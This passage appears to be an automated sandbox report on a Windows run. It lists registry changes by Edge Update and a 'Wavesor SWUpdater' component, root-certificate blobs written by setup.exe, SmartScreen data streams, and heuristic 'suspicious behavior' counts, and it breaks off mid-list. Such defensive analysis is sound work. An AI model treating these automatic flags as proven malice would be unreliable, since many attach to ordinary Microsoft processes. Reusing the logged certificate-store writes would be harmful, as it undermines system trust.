\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\WavesorSWUpdater.Update3WebUser.1.0\ = "SWUpdater Update3Web" SWUpdater.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB4F4A7E-977C-4E23-AD8F-626A491715DF} MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{99F8E195-1042-4F89-A28C-89CDB74A14AE}\ProxyStubClsid32\ = "{C7931E4D-82F7-486C-9FFB-E44AB90B021F}" MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A5135E58-384F-4244-9A5F-30FA9259413C}\NumMethods MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FEA2518F-758F-4B95-A59F-97FCEEF1F5D0}\ProxyStubClsid32 MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Interface\{E44B162B-4287-40B0-8E7A-6E251D80B3DF}\ProxyStubClsid32\ = "{D7EC6DDA-90E9-44BA-863B-6C3500BB5BDF}" SWUpdaterComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Interface\{E4E4854F-9D7B-4120-A207-CF52C875F08E}\NumMethods SWUpdaterComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32 MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DDD4B5D4-FD54-497C-8789-0830F29A60EE}\NumMethods MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B5977F34-9264-4AC3-9B31-1224827FF6E8}\LocalizedString = "@C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.195.39\\msedgeupdate.dll,-3000" MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\WOW6432Node\CLSID\{1BE9D40C-2307-4213-830E-7E3CE9EDF0C2}\VersionIndependentProgID\ = "WavesorSWUpdater.OnDemandCOMClassUser" SWUpdater.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2EC826CB-5478-4533-9015-7580B3B5E03A}\ = "IAppCommandWeb" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2603C88B-F971-4167-9DE1-871EE4A3DC84}\ = "ICredentialDialog" MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Interface\{617E37E1-AC79-4162-BACC-C797A1D31D3E}\NumMethods SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\WavesorSWUpdater.CredentialDialogUser.1.0\ = "SWUpdater CredentialDialog" SWUpdater.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB4F4A7E-977C-4E23-AD8F-626A491715DF}\ = "IAppBundle" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB4F4A7E-977C-4E23-AD8F-626A491715DF}\ = "IAppBundle" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\CLSID\{DB982438-E7B9-46E1-AF0F-CFD8947957E8}\InprocHandler32\ThreadingModel = "Both" SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\WavesorSWUpdater.OnDemandCOMClassUser\CLSID\ = "{1BE9D40C-2307-4213-830E-7E3CE9EDF0C2}" SWUpdater.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgePDF\Application\ApplicationDescription = "Browse the web" setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\WOW6432Node\Interface\{8129608C-48BD-42A6-9EBC-7B0933A5CFA3}\ProxyStubClsid32\ = "{D7EC6DDA-90E9-44BA-863B-6C3500BB5BDF}" SWUpdater.exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Interface\{894ADE70-1E5F-4520-A281-CE3BF0309CE6} SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{CECDDD22-2E72-4832-9606-A9B0E5E344B2}\ = "ServiceModule" MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB4EE1FC-0A81-4F56-B0E2-248FB78051AF}\NumMethods\ = "23" MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2EC826CB-5478-4533-9015-7580B3B5E03A}\ProxyStubClsid32 MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Interface\{92333BDA-3022-4A7F-8858-081260EA85DE}\ProxyStubClsid32 SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{79E0C401-B7BC-4DE5-8104-71350F3A9B67}\ = "IGoogleUpdate" MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\Software\Classes\AppID setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Interface\{CFDE680E-8700-4808-BAAF-8B1F50F2CC87}\ = "IPolicyStatusValue" SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Interface\{730EBDF4-7AD2-4516-BF1A-6C6F28C60CF9}\ = "IProcessLauncher" SWUpdaterComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\WOW6432Node\Interface\{E053F7BD-D525-49F4-9ADE-5D7E6FCEE775}\ProxyStubClsid32\ = "{D7EC6DDA-90E9-44BA-863B-6C3500BB5BDF}" SWUpdater.exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Interface\{62A51DF2-CCB8-4DD9-9069-34B8461617FC}\NumMethods SWUpdaterComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C853632E-36CA-4999-B992-EC0D408CF5AB}\NumMethods MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB4F4A7E-977C-4E23-AD8F-626A491715DF}\ = "IAppBundle" MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\WavesorSWUpdater.PolicyStatusUser.1.0\CLSID SWUpdater.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C853632E-36CA-4999-B992-EC0D408CF5AB}\ProxyStubClsid32\ = "{C7931E4D-82F7-486C-9FFB-E44AB90B021F}" MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8F09CD6C-5964-4573-82E3-EBFF7702865B} MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{42580F9E-2678-4BB9-A2BC-F22A1D432A1A} MicrosoftEdgeUpdateComRegisterShell64.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32 MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.pdf\OpenWithProgids\MSEdgePDF setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CECDDD22-2E72-4832-9606-A9B0E5E344B2}\ = "Update3COMClass" MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7B3B7A69-7D88-4847-A6BC-90E246A41F69}\ = "IAppVersion" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\WavesorSWUpdater.Update3WebUser\CurVer\ = "WavesorSWUpdater.Update3WebUser.1.0" SWUpdater.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C06EE550-7248-488E-971E-B60C0AB3A6E4}\ = "IApp2" MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{628ACE20-B77A-456F-A88D-547DB6CEEDD5}\AppId = "{628ACE20-B77A-456F-A88D-547DB6CEEDD5}" setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2603C88B-F971-4167-9DE1-871EE4A3DC84}\ProxyStubClsid32 MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FCE48F77-C677-4012-8A1A-54D2E2BC07BD} MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{492E1C30-A1A2-4695-87C8-7A8CAD6F936F}\VersionIndependentProgID MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E55B90F1-DA33-400B-B09E-3AFF7D46BD83}\ = "IProgressWndEvents" MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\Software\Classes\.html\OpenWithProgids setup.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f53000000010000007f000000307d3020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c009000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b060105050703080b0000000100000030000000440069006700690043006500720074002000420061006c00740069006d006f0072006500200052006f006f007400000062000000010000002000000016af57a9f676b0ab126095aa5ebadef22ab31119d644ac95cd4b93dbf3f26aeb140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c7f000000010000000c000000300a06082b060105050703097e000000010000000800000000c001b39667d601030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b90f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e404000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae4747e000000010000000800000000c001b39667d6017f000000010000000c000000300a06082b060105050703091d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df062000000010000002000000016af57a9f676b0ab126095aa5ebadef22ab31119d644ac95cd4b93dbf3f26aeb0b0000000100000030000000440069006700690043006500720074002000420061006c00740069006d006f0072006500200052006f006f007400000009000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b0601050507030853000000010000007f000000307d3020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 setup.exe -
NTFS ADS 10 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 843259.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 109902.crdownload:SmartScreen msedge.exe File created C:\Users\Admin\Downloads\Unconfirmed 419836.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 419836.crdownload:SmartScreen msedge.exe File created C:\Users\Admin\Downloads\Unconfirmed 503971.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 581162.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 756654.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 369769.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 71673.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 503971.crdownload:SmartScreen msedge.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 216 msedge.exe 216 msedge.exe 2680 msedge.exe 2680 msedge.exe 2172 identity_helper.exe 2172 identity_helper.exe 1192 msedge.exe 1192 msedge.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe 2684 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 4612 PcAppStore.exe 8500 OpenWith.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 660 Process not Found -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs
pid Process 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2680 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 5936 chrome.exe 5936 chrome.exe 5936 chrome.exe 5936 chrome.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 2664 msedge.exe 4724 msedgewebview2.exe 4724 msedgewebview2.exe 4724 msedgewebview2.exe 4724 msedgewebview2.exe 2664 msedge.exe 4724 msedgewebview2.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
